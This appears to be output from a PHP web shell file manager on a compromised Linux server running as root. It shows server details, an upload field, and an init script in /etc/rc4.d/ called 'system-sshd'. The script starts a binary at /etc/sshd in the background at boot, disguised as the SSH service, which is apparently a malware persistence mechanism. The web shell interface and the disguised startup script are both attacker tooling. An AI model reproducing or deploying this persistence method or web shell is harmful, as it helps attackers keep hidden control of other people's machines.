| Server IP : 13.235.167.51 / Your IP : 216.73.217.116 Web Server : Apache System : Linux machinox-server 6.17.0-1013-aws #13~24.04.1-Ubuntu SMP Fri Apr 24 21:36:58 UTC 2026 aarch64 User : root ( 0) PHP Version : 8.2.29 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /proc/thread-self/root/etc/rc4.d/ |
Upload File : |
#!/bin/bash ### BEGIN INIT INFO # Provides: system-sshd # Required-Start: $network # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 ### END INIT INFO D="/etc/sshd" P="/var/run/system-sshd.pid" case "$1" in start) [ -f "$P" ] && kill -0 $(cat "$P") 2>/dev/null && exit 0; nohup "$D" >/dev/null 2>&1 & echo $! > "$P" ;; stop) [ -f "$P" ] && kill $(cat "$P") 2>/dev/null; rm -f "$P" ;; restart) $0 stop; sleep 1; $0 start ;; esac